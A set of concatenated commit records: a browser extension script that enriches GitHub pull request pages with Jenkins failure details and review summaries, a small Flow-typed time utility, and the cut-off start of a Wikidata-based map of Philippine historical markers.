_specificClassNameForJenkinsFailureRedAreaLoader, _queueName) { chrome.runtime.sendMessage({ method: 'GET', action: 'xhttp', url: _testFailUrl, data: '' }, function (responseText) { var parser = new DOMParser(); var doc = parser.parseFromString(responseText, "text/html"); var h2elements = doc.getElementsByTagName("h2"); var aelements = doc.getElementsByTagName("a"); var url = window.location.href; var urlParts = url.split("/"); var pullNumber = urlParts[urlParts.length - 1]; var 
pullTitle = ""; if (typeof document.getElementsByClassName("js-issue-title")[0] !== "undefined") { pullTitle = document.getElementsByClassName("js-issue-title")[0].innerText.trim(); } var pullAuthor = ""; if (typeof document.getElementsByClassName("pull-header-username")[0] !== "undefined") { pullAuthor = document.getElementsByClassName("pull-header-username")[0].innerText.trim(); } var issueBody = "PR: [#" + pullNumber + "](" + url + ") *" + pullTitle + "* by @" + pullAuthor + "\r\n"; issueBody = issueBody + "Failure: " + _testFailUrl + "\r\n\r\n"; var htmlDescription = ""; var issueDescription = "<description>"; if (jenkinsShowFailureIndications) { if (jenkinsShowTestFailures) { for (var i = 0; i < aelements.length; i++) { var aelement = aelements[i]; if (aelement.innerText == "Test Result" && aelement.parentNode.tagName == "TD") { var unitTestFailures = aelement.parentNode.getElementsByTagName("li"); if (unitTestFailures.length > 0) { if (unitTestFailures.length <= 10) { htmlDescription = htmlDescription + "<b>" + unitTestFailures.length + " Test Failures:</b><br />"; issueBody = issueBody + "**" + unitTestFailures.length + " Test Failures:**\r\n"; } else { htmlDescription = htmlDescription + "<b>" + unitTestFailures.length + " Test Failures:</b> (showing first 10)<br />"; issueBody = issueBody + "**" + unitTestFailures.length + " Test Failures:** (showing first 10)\r\n"; } } for (var j = 0; j < unitTestFailures.length && j < 10; j++) { var unitTestFailure = unitTestFailures[j]; htmlDescription = htmlDescription + "&nbsp;&nbsp;&nbsp;&nbsp;" + unitTestFailure.innerText + "<br />"; issueBody = issueBody + unitTestFailure.innerText + "\r\n"; } htmlDescription = htmlDescription + "<br />"; issueBody = issueBody + "\r\n"; } } } var count = 1; for (var i = 0; i < h2elements.length; i++) { var h2 = h2elements[i]; if (h2.innerHTML == "HTTP ERROR 404") { htmlDescription = htmlDescription + "404: Build details page could not be found."; issueDescription = "404: Build details page could not be found."; } if (h2.innerHTML == "Identified problems") { var nodeWithErrorSiblings = h2.parentNode.parentNode; var errorRow = nodeWithErrorSiblings; while ((errorRow = errorRow.nextSibling) != null) { if (count > 1) { issueBody = issueBody + "\r\n\r\n"; htmlDescription = htmlDescription + "<br /><br />"; } var failureTitle = ""; var failureDescription = ""; var h3s = errorRow.getElementsByTagName("h3"); var h4s = errorRow.getElementsByTagName("h4"); if (h3s.length > 0) { failureTitle = h3s[0].innerHTML.split("<br")[0].trim(); failureDescription = h3s[0].getElementsByTagName("b")[0].innerHTML.trim(); } else if (h4s.length > 0) { failureTitle = h4s[0].innerHTML.trim(); failureDescription = h4s[1].innerHTML.trim(); } if (count == 1) { issueDescription = failureTitle; } issueBody = issueBody + "**Issue " + count + ": " + failureTitle + "**\r\n"; issueBody = issueBody + failureDescription; htmlDescription = htmlDescription + "<b>Issue " + count + ": " + failureTitle + "</b><br />" + failureDescription; count++; } } } if (count > 2) { issueDescription = issueDescription + " (+" + (count - 2) + " more)"; } if (count == 1) { // we failed to find the failure, or there was none. // should we add special handling here? 
} } var testQueueName = _testFailure.parentNode.getElementsByClassName("text-emphasized")[0].innerText.trim(); var issueTitle = "[Test Failure] " + issueDescription + " in " + testQueueName + " on PR #" + pullNumber; var issueCreationRouting = currentSettings[option_issueCreationRouting]; var issueRoutes = issueCreationRouting.trim().match(/[^\r\n]+/g); var targetOrg = currentPageOrg; var targetRepo = currentPageRepo; for (var routeNum = 0; routeNum < issueRoutes.length; routeNum++) { var routeParts = issueRoutes[routeNum].trim().split(":"); var fromParts = routeParts[0].trim().split("/"); var toParts = routeParts[1].trim().split("/"); if (fromParts.length == 2 && toParts.length == 2 && fromParts[0].trim() == currentPageOrg && fromParts[1].trim() == currentPageRepo) { targetOrg = toParts[0].trim(); targetRepo = toParts[1].trim(); break; } } var previousFailureUrl = _testFailUrl; var defaultIssueLabelsSpecs = currentSettings[option_defaultIssueLabels].trim().match((/[^\r\n]+/g)); log("Determining issue labels...") var labelsToUse = new Array(); for (var specNum = 0; specNum < defaultIssueLabelsSpecs.length; specNum++) { log(" Checking: " + defaultIssueLabelsSpecs[specNum]); var specParts = defaultIssueLabelsSpecs[specNum].trim().split(":"); var scopeParts = specParts[0].split("/"); var organization = scopeParts[0].trim(); if (organization == currentPageOrg) { if (scopeParts.length == 1 || scopeParts[1].trim() == currentPageRepo) { var labelList = specParts[1].trim().split(","); log(" Matches. Adding " + labelList.toString()); for (var labelNum = 0; labelNum < labelList.length; labelNum++) { labelName = labelList[labelNum].trim(); if (!(labelName in labelsToUse)) { log(" Actually adding: " + labelName); labelsToUse.push(labelName); } } } } } log("Calculated labelsToUse: " + labelsToUse); // "&labels[]=Area-Infrastructure&labels[]=Contributor%20Pain" var labelUrlPart = ""; if (labelsToUse.length > 0) { for (var labelNum = 0; labelNum < labelsToUse.length; labelNum++) { labelUrlPart = labelUrlPart + "&labels[]=" + labelsToUse[labelNum]; } } log("Constructed labels url part: " + labelUrlPart); var url = "https://github.com/" + targetOrg + "/" + targetRepo + "/issues/new?title=" + encodeURIComponent(issueTitle) + "&body=" + encodeURIComponent(issueBody) + labelUrlPart; var jobName = testQueueName; var retestButton = doc.createElement("input"); retestButton.setAttribute("type", "button"); retestButton.setAttribute("value", "Retest"); retestButton.setAttribute("name", "buttonname"); retestButton.onclick = (function () { var thisUrl = url; var thisJobName = jobName; var thisPreviousFailureUrl = previousFailureUrl; return function () { log("Finding retest text"); var rerunTextEntries = currentSettings[option_testRerunText].trim().match((/[^\r\n]+/g)); // * = 1, org = 2, repo = 3 var bestMatchLevel = 0; var descriptor = "retest {0} please"; for (var rerunTextNum = 0; rerunTextNum < rerunTextEntries.length; rerunTextNum++) { log(" Considering " + rerunTextEntries[rerunTextNum].trim()); var rerunEntryParts = rerunTextEntries[rerunTextNum].trim().split(":"); var scope = rerunEntryParts[0].trim(); var matchLevel = 0; var entryMatches = false; if (scope == "*") { matchLevel = 1; entryMatches = true; } else if (scope.indexOf("/") == -1) { matchLevel = 2; entryMatches = scope == currentPageOrg; } else { matchLevel = 3; var org = scope.split("/")[0]; var repo = scope.split("/")[1]; entryMatches = org == currentPageOrg && repo == currentPageRepo; } log(" Matches / Level: " + entryMatches + "/" + matchLevel); 
if (entryMatches && matchLevel > bestMatchLevel) { var descriptor = rerunEntryParts[1].trim(); log(" Setting new best match to: " + descriptor); } } log("Best-match retest text: " + descriptor); var commentText = ""; if (descriptor.indexOf("{0}") == -1) { commentText = descriptor; log(" No placeholder, so commentText is " + commentText); } else { var placeholderLocation = descriptor.indexOf("{0}"); var commentTextStart = descriptor.substr(0, placeholderLocation); var commentTextEnd = descriptor.substr(placeholderLocation + "{0}".length); var commentText = commentTextStart + thisJobName + commentTextEnd; log(" commentText with filled placeholder is " + commentText); } commentText = commentText + "\n// Previous failure: " + thisPreviousFailureUrl + "\n// Retest reason: "; $("#new_comment_field").val(commentText); var offset = $("#new_comment_field").offset(); offset.left -= 20; offset.top -= 20; $('html, body').animate({ scrollTop: offset.top, scrollLeft: offset.left }); $("#new_comment_field").stop().css("background-color", "#FFFF9C") .animate({ backgroundColor: "#FFFFFF" }, 1500); }; })(); retestButton.className = "btn btn-sm " + stashPopClassName + " " + jenkinsReloadableInfoClassName; retestButton.style.margin = "0px 0px 3px 0px"; if (jenkinsShowRetestButton) { _testFailure.parentNode.insertBefore(retestButton, _testFailure.parentNode.firstChild); } var button = doc.createElement("input"); button.setAttribute("type", "button"); button.setAttribute("value", "Create Issue"); button.setAttribute("name", "buttonname"); button.onclick = (function () { var thisUrl = url; return function () { window.open(thisUrl); }; })(); button.className = "btn btn-sm " + stashPopClassName + " " + jenkinsReloadableInfoClassName; button.style.margin = "0px 0px 3px 0px"; if (jenkinsShowBugFilingButton) { _testFailure.parentNode.insertBefore(button, _testFailure.parentNode.firstChild); } if (jenkinsShowFailureIndications) { executeCallbackIfPermissionPresent(_testFailUrl, function () { var div = doc.createElement("div"); if (typeof htmlDescription === "undefined" || htmlDescription == "") { htmlDescription = "Unknown Failure - If this is a private Jenkins job, click the 'Details' button to reauthenticate and then reload this failure data."; } div.innerHTML = htmlDescription.trim(); div.style.backgroundColor = "#FFAAAA"; div.className = stashPopClassName + " " + jenkinsReloadableInfoClassName; _testFailure.parentNode.appendChild(div); }); } $("." 
+ _specificClassNameForJenkinsFailureRedAreaLoader).remove(); callbackWhenTestProcessed(_queueName, _testFailUrl, htmlDescription, _specificClassNameForPRListFailure); }); })(testFailure, testFailUrl, specificClassNameForPRListFailure, specificClassNameForJenkinsFailureRedAreaLoader, queueName); } } function makeBuildStatusWindowsBig() { var lists = document.getElementsByClassName("build-statuses-list"); for (var i = 0; i < lists.length; i++) { lists[i].style.maxHeight = "5000px"; } } function addJenkinsRefreshButton(currentSettings) { var lists = $(".build-statuses-list"); for (var i = 0; i < lists.length; i++) { var list = lists[i]; var a = document.createElement("a"); a.href = "#"; a.className = stashPopClassName + " " + jenkinsReloadableInfoClassName + " jenkinsreload"; a.text = "Reload Jenkins data"; list.previousSibling.previousSibling.appendChild(a); } $('.jenkinsreload').click(function (e) { e.preventDefault(); reloadJenkins(currentSettings); }); } function normalizeAndRemoveUrlParameters(str) { str = stripFragment(str); str = stripQueryString(str); return stripTrailingSlash(str); } function stripTrailingSlash(str) { return str.substr(-1) === '/' ? str.substring(0, str.length - 1) : str; } function stripQueryString(str) { return str.indexOf('?') >= 0 ? str.substring(0, str.indexOf('?')) : str; } function stripFragment(str) { return str.indexOf('#') >= 0 ? str.substring(0, str.indexOf('#')) : str; } function inlineFailureInfoToPRList(title, className, i, currentSettings) { var clickToLoadText = title.getElementsByClassName(className)[0]; if (typeof clickToLoadText === "undefined") { // Already expanded. Don't re-expand. return; } $("." + className).remove(); log("Inlining Jenkins failures to PR list for " + className + " (position " + i + " on this page)"); // On github.com/pulls there are two "issue-title-link" elements. 
var thisFailureUrl = title.getElementsByClassName("issue-title-link js-navigation-open")[0].href; log("thisFailureUrl:" + thisFailureUrl); executeCallbackIfUrlAccessGranted(thisFailureUrl, function () { var redDiv = document.createElement("div"); redDiv.style.backgroundColor = "#FFAAAA"; redDiv.className = stashPopClassName + " " + jenkinsReloadableInfoClassName; var loading = document.createElement("img"); var imgUrl = chrome.extension.getURL("images/loading.gif"); loading.src = imgUrl; var prLoadingDiv = document.createElement("div"); prLoadingDiv.style.backgroundColor = "#FFAAAA"; prLoadingDiv.style.color = "#000000"; prLoadingDiv.appendChild(loading); var t = document.createTextNode("Loading PR contents..."); prLoadingDiv.appendChild(t); var specificClassName = stashPopClassName + "_LoadPRContents_" + i; prLoadingDiv.className = specificClassName; redDiv.appendChild(prLoadingDiv); (function (_thisFailureUrl, _divToAddTo, _prLoadingDiv) { chrome.runtime.sendMessage({ method: 'GET', action: 'xhttp', url: _thisFailureUrl, data: '' }, function (responseText) { var parser = new DOMParser(); var doc = parser.parseFromString(responseText, "text/html"); processTestFailures( doc, _prLoadingDiv, i, true, true, true, true, function (failurequeue, detailsurl, resultstr, classNameToPlaseResultsIn) { var divToPlaceResultsIn = document.getElementsByClassName(classNameToPlaseResultsIn)[0]; while (divToPlaceResultsIn.firstChild) { divToPlaceResultsIn.removeChild(divToPlaceResultsIn.firstChild); } var _individualFailureDiv = document.createElement("div"); var _span = document.createElement("span"); _span.innerHTML = "<b><u>" + failurequeue + "</u></b> <a href = '" + encodeURI(detailsurl) + "' target='_blank'>Details</a><br />"; _individualFailureDiv.appendChild(_span); var _nestedDiv = document.createElement("div"); _nestedDiv.style.padding = "0px 0px 0px 30px"; var _span2 = document.createElement("span"); _span2.innerHTML = resultstr + "<br /><br />"; _nestedDiv.appendChild(_span2); _individualFailureDiv.appendChild(_nestedDiv); _individualFailureDiv.style.color = "#000000"; divToPlaceResultsIn.appendChild(_individualFailureDiv); }, currentSettings); }); })(thisFailureUrl, redDiv, prLoadingDiv); title.appendChild(redDiv); }); } function executeCallbackIfPermissionPresent(url, callback) { log("Checking access for " + url + "..."); chrome.runtime.sendMessage({ method: "checkOriginAccess", keys: [url] }, function (response) { if (response) { log(" Permission present. Executing callback."); callback(); } else { log(" Permission missing."); } }); } function executeCallbackIfPermissionMissing(url, callback) { log("Checking access for " + url + "..."); chrome.runtime.sendMessage({ method: "checkOriginAccess", keys: [url] }, function (response) { if (response) { log(" Permission present."); } else { log(" Permission missing. 
Executing callback."); callback(); } }); } function openJenkinsDetailsInNewTab(currentSettings) { var detailsLinks = document.getElementsByClassName("build-status-details"); for (var i = 0; i < detailsLinks.length; i++) { var detailsLink = detailsLinks[i]; detailsLink.target = "_blank"; (function (_detailsLink) { executeCallbackIfPermissionMissing( detailsLink.href, function () { var grantAccessLink = createRequestJenkinsAccessLinkWithCallbackIfAllowed( _detailsLink.href, function () { reloadJenkins(false, currentSettings); return false; }); grantAccessLink.className = "build-status-details right"; _detailsLink.parentNode.insertBefore(grantAccessLink, _detailsLink.nextSibling); }) })(detailsLink); } } function addCodeReviewSummaryAndButtons(codeReviewOptions) { var splitCodeOptions = codeReviewOptions.split(";"); var positiveIndicatorsString = splitCodeOptions[1].trim(); var negativeIndicatorsString = splitCodeOptions[2].trim(); var testedIndicatorsString = splitCodeOptions[3].trim(); if (positiveIndicatorsString.length == 0 && negativeIndicatorsString.length == 0 && testedIndicatorsString.length == 0) { log("Empty code review options. Bail.") return; } // Buttons var btnList = document.getElementById("partial-new-comment-form-actions"); var text = document.createElement("font"); text.color = "#666666"; text.textContent = "Code Review: "; btnList.appendChild(text); var positiveIndicators = positiveIndicatorsString.split(","); var negativeIndicators = negativeIndicatorsString.split(","); var testedIndicators = testedIndicatorsString.split(","); if (positiveIndicatorsString.length > 0) { btnList.appendChild(createCommentSettingLink("Approve", positiveIndicators[0], "#00aa00")); } if (negativeIndicatorsString.length > 0) { btnList.appendChild(createCommentSettingLink("Reject", negativeIndicators[0], "#aa0000")); } if (testedIndicatorsString.length > 0) { btnList.appendChild(createCommentSettingLink("Tested", testedIndicators[0])); } // Reviews var positiveReviews = new Array(); var negativeReviews = new Array(); var testReviews = new Array(); var comments = document.getElementsByClassName("timeline-comment-wrapper"); for (var i = 0; i < comments.length; i++) { var comment = comments[i]; if (comment.classList.contains("timeline-new-content")) { continue; } // TODO: exclude "email-hidden-reply", example https://github.com/mono/mono/pull/2420 var body = comment.children[1].getElementsByClassName("js-comment-body")[0]; if (typeof body !== "undefined") { var bodyHtml = body.innerHTML; if (positiveIndicatorsString.length > 0) { for (var c = 0; c < positiveIndicators.length; c++) { if (bodyHtml.indexOf(positiveIndicators[c]) >= 0) { positiveReviews.push(comment); break; } } } if (negativeIndicatorsString.length > 0) { for (var c = 0; c < negativeIndicators.length; c++) { if (bodyHtml.indexOf(negativeIndicators[c]) >= 0) { negativeReviews.push(comment); break; } } } if (testedIndicatorsString.length > 0) { for (var c = 0; c < testedIndicators.length; c++) { if (bodyHtml.indexOf(testedIndicators[c]) >= 0) { testReviews.push(comment); break; } } } } } if (positiveReviews.length > 0 || negativeReviews.length > 0 || testReviews.length > 0) { var reviewsContainer = document.createElement("div"); reviewsContainer.setAttribute("class", stashPopClassName); if (positiveReviews.length > 0) { addReviewsToReviewContainerAndColorizeReviews(reviewsContainer, "Approvals", positiveReviews, "#77ff77"); } if (negativeReviews.length > 0) { addReviewsToReviewContainerAndColorizeReviews(reviewsContainer, "Rejections", 
negativeReviews, "#ff7777"); } if (testReviews.length > 0) { addReviewsToReviewContainerAndColorizeReviews(reviewsContainer, "Tested by", testReviews, "#77ccff"); } var discussion = document.getElementsByClassName("js-discussion")[0]; discussion.insertBefore(reviewsContainer, discussion.firstChild); } } function getBestCodeReviewOptions(codeReviewOptions) { var codeReviewOptionsEntries = codeReviewOptions.trim().match((/[^\r\n]+/g)); log("Calculating best matching code review options"); // * = 1, org = 2, repo = 3 var bestMatchLevel = 0; for (var i = 0; i < codeReviewOptionsEntries.length; i++) { log(" Considering " + codeReviewOptionsEntries[i].trim()); var rerunEntryParts = codeReviewOptionsEntries[i].trim().split(";"); var scope = rerunEntryParts[0].trim(); var matchLevel = 0; var entryMatches = false; if (scope == "*") { matchLevel = 1; entryMatches = true; } else if (scope.indexOf("/") == -1) { matchLevel = 2; entryMatches = scope == currentPageOrg; } else { matchLevel = 3; var org = scope.split("/")[0]; var repo = scope.split("/")[1]; entryMatches = org == currentPageOrg && repo == currentPageRepo; } log(" Matches / Level: " + entryMatches + "/" + matchLevel); if (entryMatches && matchLevel > bestMatchLevel) { var bestMatch = codeReviewOptionsEntries[i].trim(); log(" Setting new best match to: " + bestMatch); } } log("Best-match code review options: " + bestMatch); return bestMatch; } function addReviewsToReviewContainerAndColorizeReviews(reviewsContainer, title, reviews, backgroundColor) { var titleDiv = document.createElement("div"); var titleText = document.createElement("b"); titleText.textContent = title + ": "; titleDiv.appendChild(titleText); titleDiv.style.cssFloat = "left"; titleDiv.style.display = "block"; reviewsContainer.appendChild(titleDiv); var reviewListDiv = document.createElement("div"); reviewListDiv.style.cssFloat = "left"; reviewListDiv.style.display = "block"; for (var i = 0; i < reviews.length; i++) { var review = reviews[i]; var headerForBackground = review.getElementsByClassName("timeline-comment-header")[0]; headerForBackground.style.backgroundColor = backgroundColor; var header = review.getElementsByClassName("timeline-comment-header-text")[0]; var username = header.getElementsByTagName("strong")[0].innerText; var label = review.getElementsByClassName("timeline-comment-label")[0]; var labelPart = ""; if (typeof label !== "undefined") { var reviewerKind = label.innerText; labelPart = "<span class='timeline-comment-label' style='margin:0px;'>" + reviewerKind + "</span>"; } var time = review.getElementsByTagName("time")[0].innerText; var imgTag = review.children[0].children[0].cloneNode(); imgTag.className = "avatar"; imgTag.height = 24; imgTag.width = 24; // imgTag.style.marginLeft = "3px"; var tooltip = review.children[1].getElementsByClassName("js-comment-body")[0].innerHTML; var tooltipHeader = labelPart + "<p><b>" + username + "</b> commented " + time + "</p>"; imgTag.setAttribute("stashpop-title", tooltipHeader + tooltip); //var link = document.createElement("a"); ////link.className = "participant-avatar tooltipped tooltipped-s"; //// link.setAttribute("aria-label", tooltip); //link.href = "#"; //link.appendChild(imgTag); imgTag.role = "button"; imgTag.style.cursor = "pointer"; imgTag.style.margin = "0px 0px 3px 3px"; var clickLocation = "#" + header.getElementsByClassName("timestamp")[0].href.split("#")[1]; (function (newLocation) { imgTag.onclick = function () { // todo: navigation doesn't work if location.hash == newLocation location.hash = 
newLocation; }; })(clickLocation); reviewListDiv.appendChild(imgTag); if (i % 10 == 9) { reviewListDiv.appendChild(document.createElement("br")); } } reviewsContainer.appendChild(reviewListDiv); var clearDiv = document.createElement("div"); clearDiv.style.clear = "both"; reviewsContainer.appendChild(clearDiv); } function sendmultimail(issuesList, isPull) { var baseUrl = document.getElementsByClassName("entry-title")[0].getElementsByTagName('strong')[0].getElementsByTagName('a')[0].href; baseUrl = baseUrl + (isPull ? "/pull/" : "/issues/"); var owner = document.getElementsByClassName("entry-title")[0].getElementsByClassName("author")[0].getElementsByTagName("span")[0].innerHTML; var repo = document.getElementsByClassName("entry-title")[0].getElementsByTagName("strong")[0].getElementsByTagName("a")[0].innerHTML; var body = ""; var shortBody = ""; var count = 0; var singleIssueNumber = ""; var singleIssueTitle = ""; for (var i = 0; i < issuesList.children.length; i++) { if (issuesList.children[i].classList.contains("selected")) { count++; var issue = issuesList.children[i]; var title = issue.getElementsByClassName("issue-title")[0]; var urlParts = title.getElementsByClassName("issue-title-link")[0].href.split("/"); var issueNumber = urlParts[urlParts.length - 1].trim(); var issueTitle = title.getElementsByClassName("issue-title-link")[0].innerHTML.trim(); singleIssueNumber = issueNumber; singleIssueTitle = issueTitle; // TODO: Fetch the target branch of each PR. body = body + issueTitle + " " + baseUrl + issueNumber + "\r\n"; shortBody = shortBody + "#" + issueNumber + ": " + issueTitle + "\r\n"; } } if (count == 1) { sendmail(singleIssueNumber, singleIssueTitle, isPull); return; } var subject = owner + "/" + repo + ": " + count + " Selected " + (isPull ? "PRs" : "Issues"); body = body + "\r\n\r\n"; // TODO: Assigned to, etc. shortBody = shortBody + "\r\n\r\n"; // TODO: Assigned to, etc. var isPublic = (typeof document.getElementsByClassName("entry-title private")[0] === "undefined"); if (!isPublic) { body = body + "Notice: This message contains information about a private repository." shortBody = shortBody + "Notice: This message contains information about a private repository." } var decodedSubject = $('<div/>').html(subject).text(); var decodedBody = $('<div/>').html(body).text(); var decodedShortBody = $('<div/>').html(shortBody).text(); var finalFullMailToUrl = "mailto:?subject=" + encodeURIComponent(decodedSubject) + "&body=" + encodeURIComponent(decodedBody); var finalShortMailToUrl = "mailto:?subject=" + encodeURIComponent(decodedSubject) + "&body=" + encodeURIComponent(decodedShortBody); if (finalFullMailToUrl.length <= 2083) { window.location.href = finalFullMailToUrl; } else if (finalShortMailToUrl.length <= 2083) { window.location.href = finalShortMailToUrl; window.alert("issue links omitted to fit within the maximum mailto url length"); } else { window.alert("mailto maximum url length exceeded, choose fewer items"); } } function sendmail(issueNumber, issueTitle, isPull) { issueTitle = issueTitle.trim(); issueNumber = issueNumber.trim(); var baseUrl = document.getElementsByClassName("entry-title")[0].getElementsByTagName('strong')[0].getElementsByTagName('a')[0].href; var kind = isPull ? "PR" : "Issue"; baseUrl = baseUrl + (isPull ? 
"/pull/" : "/issues/"); var owner = document.getElementsByClassName("entry-title")[0].getElementsByClassName("author")[0].getElementsByTagName("span")[0].innerHTML; var repo = document.getElementsByClassName("entry-title")[0].getElementsByTagName("strong")[0].getElementsByTagName("a")[0].innerHTML; var targetBranchDisplay = ""; if (isPull) { if (isListPage) { // The PR list page contains no information about target branch, so we have to go look it up. var url = "https://github.com/" + currentPageOrg + "/" + currentPageRepo + "/pull/" + issueNumber; chrome.runtime.sendMessage({ method: 'GET', action: 'xhttp', url: url, data: '' }, function (responseText) { var parser = new DOMParser(); var doc = parser.parseFromString(responseText, "text/html"); var fullTargetBranchSpec = doc.getElementsByClassName("current-branch")[0].innerText; log("PR target branch (from individual PR page): " + fullTargetBranchSpec); finishIt(fullTargetBranchSpec); }); } else { var targetFullBranchSpecParts = $(".current-branch").first().text().split(":"); var targetBranch = targetFullBranchSpecParts.length == 1 ? targetFullBranchSpecParts[0] : targetFullBranchSpecParts[1]; log("PR target branch: " + targetBranch); if (targetBranch != "master" && targetBranch != "") { targetBranchDisplay = "/" + targetBranch; log("PR target branch display: " + targetBranchDisplay); } } } var subject = owner + "/" + repo + targetBranchDisplay + " " + kind + " #" + issueNumber + ": " + issueTitle; var body = baseUrl + issueNumber + "\r\n\r\n"; // TODO: Assigned to, etc. var isPublic = (typeof document.getElementsByClassName("entry-title private")[0] === "undefined"); if (!isPublic) { body = body + "Notice: This message contains information about a private repository." } var decodedSubject = $('<div/>').html(subject).text(); var decodedBody = $('<div/>').html(body).text(); window.location.href = "mailto:?subject=" + encodeURIComponent(decodedSubject) + "&body=" + encodeURIComponent(decodedBody); }
Make contributor signoffs more obvious than non-contributors
content.js
Make contributor signoffs more obvious than non-contributors
<ide><path>ontent.js <ide> reviewsContainer.setAttribute("class", stashPopClassName); <ide> <ide> if (positiveReviews.length > 0) { <del> addReviewsToReviewContainerAndColorizeReviews(reviewsContainer, "Approvals", positiveReviews, "#77ff77"); <add> addReviewsToReviewContainerAndColorizeReviews(reviewsContainer, "Approvals", positiveReviews, "#77ff77", "#edffed", "#00cc00"); <ide> } <ide> <ide> if (negativeReviews.length > 0) { <del> addReviewsToReviewContainerAndColorizeReviews(reviewsContainer, "Rejections", negativeReviews, "#ff7777"); <add> addReviewsToReviewContainerAndColorizeReviews(reviewsContainer, "Rejections", negativeReviews, "#ff7777", "#ffedf6", "#cc0000"); <ide> } <ide> <ide> if (testReviews.length > 0) { <del> addReviewsToReviewContainerAndColorizeReviews(reviewsContainer, "Tested by", testReviews, "#77ccff"); <add> addReviewsToReviewContainerAndColorizeReviews(reviewsContainer, "Tested by", testReviews, "#77ccff", "#dff6ff", "#0000cc"); <ide> } <ide> <ide> var discussion = document.getElementsByClassName("js-discussion")[0]; <ide> return bestMatch; <ide> } <ide> <del>function addReviewsToReviewContainerAndColorizeReviews(reviewsContainer, title, reviews, backgroundColor) { <add>function addReviewsToReviewContainerAndColorizeReviews(reviewsContainer, title, reviews, contributorBackgroundColor, externalBackgroundColor, contributorAggregationBackground) { <ide> var titleDiv = document.createElement("div"); <ide> var titleText = document.createElement("b"); <ide> titleText.textContent = title + ": "; <ide> reviewListDiv.style.cssFloat = "left"; <ide> reviewListDiv.style.display = "block"; <ide> <add> var commentsFromContributors = new Array(); <add> var commentsFromNonContributors = new Array(); <add> <ide> for (var i = 0; i < reviews.length; i++) { <ide> var review = reviews[i]; <del> <del> var headerForBackground = review.getElementsByClassName("timeline-comment-header")[0]; <del> headerForBackground.style.backgroundColor = backgroundColor; <ide> <ide> var header = review.getElementsByClassName("timeline-comment-header-text")[0]; <ide> var username = header.getElementsByTagName("strong")[0].innerText; <ide> labelPart = "<span class='timeline-comment-label' style='margin:0px;'>" + reviewerKind + "</span>"; <ide> } <ide> <add> var headerForBackground = review.getElementsByClassName("timeline-comment-header")[0]; <add> headerForBackground.style.backgroundColor = (labelPart == "" ? externalBackgroundColor : contributorBackgroundColor); <add> <ide> var time = review.getElementsByTagName("time")[0].innerText; <ide> <ide> var imgTag = review.children[0].children[0].cloneNode(); <ide> imgTag.className = "avatar"; <del> imgTag.height = 24; <del> imgTag.width = 24; <del> // imgTag.style.marginLeft = "3px"; <add> imgTag.height = 35; <add> imgTag.width = 35; <add> imgTag.style.backgroundColor = (labelPart == "" ? 
"#C8C8C8" : contributorAggregationBackground); <add> imgTag.style.padding = "3px"; <ide> <ide> var tooltip = review.children[1].getElementsByClassName("js-comment-body")[0].innerHTML; <ide> var tooltipHeader = labelPart + "<p><b>" + username + "</b> commented " + time + "</p>"; <ide> imgTag.setAttribute("stashpop-title", tooltipHeader + tooltip); <del> //var link = document.createElement("a"); <del> ////link.className = "participant-avatar tooltipped tooltipped-s"; <del> //// link.setAttribute("aria-label", tooltip); <del> //link.href = "#"; <del> <del> //link.appendChild(imgTag); <del> <ide> imgTag.role = "button"; <ide> imgTag.style.cursor = "pointer"; <ide> imgTag.style.margin = "0px 0px 3px 3px"; <ide> }; <ide> })(clickLocation); <ide> <del> reviewListDiv.appendChild(imgTag); <add> if (labelPart == "") { <add> commentsFromNonContributors.push(imgTag); <add> } else { <add> commentsFromContributors.push(imgTag); <add> } <add> } <add> <add> var allComments = commentsFromContributors.concat(commentsFromNonContributors); <add> for (var i = 0; i < allComments.length; i++) { <add> reviewListDiv.appendChild(allComments[i]); <ide> <ide> if (i % 10 == 9) { <ide> reviewListDiv.appendChild(document.createElement("br"));
JavaScript
apache-2.0
78c82c772edadad3e5db19d9a4165fc3dcb10163
0
8845musign/hanten-timer
// @flow import moment from 'moment' export default class TimeUtil { static unix2mmss (unix: number): string { return moment(unix).format('mm:ss') } }
utils/Time.js
import moment from 'moment' export default class TimeUtil { static unix2mmss (unix) { return moment(unix).format('mm:ss') } }
Add typing
utils/Time.js
Add typing
<ide><path>utils/Time.js <add>// @flow <ide> import moment from 'moment' <ide> <ide> export default class TimeUtil { <del> static unix2mmss (unix) { <add> static unix2mmss (unix: number): string { <ide> return moment(unix).format('mm:ss') <ide> } <ide> }
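The typing change above only annotates the parameter and return value; with Flow checking enabled, passing anything other than a number would be reported before runtime. A small usage sketch (the import path and the values are illustrative, not part of the repository):

// @flow
import TimeUtil from './utils/Time'

const label: string = TimeUtil.unix2mmss(Date.now())  // OK: number in, string out
// TimeUtil.unix2mmss('now')                          // Flow error: string is incompatible with number
console.log(label)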
JavaScript
mit
d7cec93e14d9e0df1a5f4ed6c10f6b16efbb25de
0
WMPH/eph-historical-markers-map,WMPH/eph-historical-markers-map
'use strict'; // Constants and fixed parameters const WDQS_API_URL = 'https://query.wikidata.org/sparql'; const COMMONS_WIKI_URL_PREF = 'https://commons.wikimedia.org/wiki/'; const COMMONS_API_URL = 'https://commons.wikimedia.org/w/api.php'; const YEAR_PRECISION = '9'; const PH_QID = 'Q928'; const REGION_QID = 'Q24698'; const PROVINCE_QID = 'Q24746'; const HUC_QID = 'Q29946056'; const CITY_QID = 'Q104157'; const ADMIN_QIDS = [REGION_QID, PROVINCE_QID, HUC_QID, CITY_QID]; const ADMIN_LEVELS = 4; const OSM_LAYER_URL = 'https://{s}.tile.openstreetmap.org/{z}/{x}/{y}.png'; const OSM_LAYER_ATTRIBUTION = 'Base map &copy; <a href="https://www.openstreetmap.org/copyright">OpenStreetMap contributors</a>'; const CARTO_LAYER_URL = 'https://cartodb-basemaps-{s}.global.ssl.fastly.net/rastertiles/voyager_labels_under/{z}/{x}/{y}{r}.png'; const CARTO_LAYER_ATTRIBUTION = 'Base map &copy; <a href="https://www.openstreetmap.org/copyright">OpenStreetMap contributors</a> (data), <a href="https://carto.com/">CARTO</a> (style)'; const WIKI_LAYER_URL = 'https://maps.wikimedia.org/osm-intl/{z}/{x}/{y}{r}.png'; const WIKI_LAYER_ATTRIBUTION = 'Base map &copy; <a href="https://www.openstreetmap.org/copyright">OpenStreetMap contributors</a> (data), <a href="https://carto.com/">Wikimedia Foundation</a> (style)'; const TILE_LAYER_MAX_ZOOM = 19; const MIN_PH_LAT = 4.5; const MAX_PH_LAT = 21.0; const MIN_PH_LON = 116.5; const MAX_PH_LON = 126.5; // Globals var Records = {}; // Main app database, keyed by QID var SparqlValuesClause; // SPARQL "VALUES" clause containing the QIDs of all main Wikidata items var Map; // Leaflet map object var Cluster; // Leaflet map cluster var 